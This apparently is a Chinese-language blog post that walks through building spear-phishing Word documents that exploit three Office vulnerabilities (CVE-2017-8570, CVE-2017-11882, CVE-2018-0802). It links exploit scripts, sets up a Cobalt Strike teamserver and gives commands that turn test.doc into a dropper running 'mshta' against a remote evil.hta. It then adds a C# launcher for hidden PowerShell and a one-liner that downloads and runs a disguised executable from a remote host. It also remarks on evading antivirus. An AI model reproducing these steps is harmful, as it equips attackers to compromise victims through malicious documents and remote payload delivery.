看了一天apt报告,主流利用Office鱼叉攻击的漏洞,还是这Microsoft Office CVE-2017-8570,CVE-2017-11882和CVE-2018-0802 三个,而且都知道office一般都不更新,很容易打开就中。但是doc免杀比较难,很容易被杀,比如主流的mshta这种方式。
利用脚本:
https://github.com/denmilu/CVE-2018-0802_CVE-2017-11882 这个脚本集成了两个漏洞
https://github.com/rxwx/CVE-2018-0802
https://github.com/Ridter/CVE-2017-11882/
也可以使用msf模块。
Linux (Kali 2018.4, Ubuntu 18.04)
- Update APT
sudo apt-get update - Install OpenJDK 11 with APT
sudo apt-get install openjdk-11-jdk - Make OpenJDK 11 the default:
sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
Linux (Other)
- Uninstall the current OpenJDK package(s)
- Download OpenJDK for Linux/x64 at: https://jdk.java.net/11/
- Extract the OpenJDK binary:
tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz - Move the OpenJDK folder to /usr/local:
mv jdk-11.0.1 /usr/local - Add the following to ~/.bashrc
JAVA_HOME="/usr/local/jdk-11.0.1"
PATH=$PATH:$JAVA_HOME/bin - Refresh your ~/.bashrc to make the new environment variables take effect
source ~/.bashrc
具体环境安装可以参考cobalt strike官方。https://www.cobaltstrike.com/help-java-dependency
chmod +x teamserver
nohup ./teamserver IP 密码 &
先使用cobalt strike 生成一个hta的payload
python webdav_exec_CVE-2017-11882.py -u http://xxxxx.xx.xxx:8001/evil.hta -e "mshta http://xxxx.x.x.x.x:8001/evil.hta" -o test.doc
python RTF_11882_0802.py -c "mshta http://xx.xxx.xx.xx:8001/evil.hta" -o test.doc
也可以参考这边文章:
http://www.sohu.com/a/222892615_609556
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace shell
{
class Program
{
static void Main(string[] args)
{
string strCmdText;
strCmdText = "your-powershell-here";
System.Diagnostics.Process.Start("powershell.exe", strCmdText);
}
}
}
powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://xx.xx.xx.xx.xx/notepad.exe','notepad.exe');start-process notepad.exe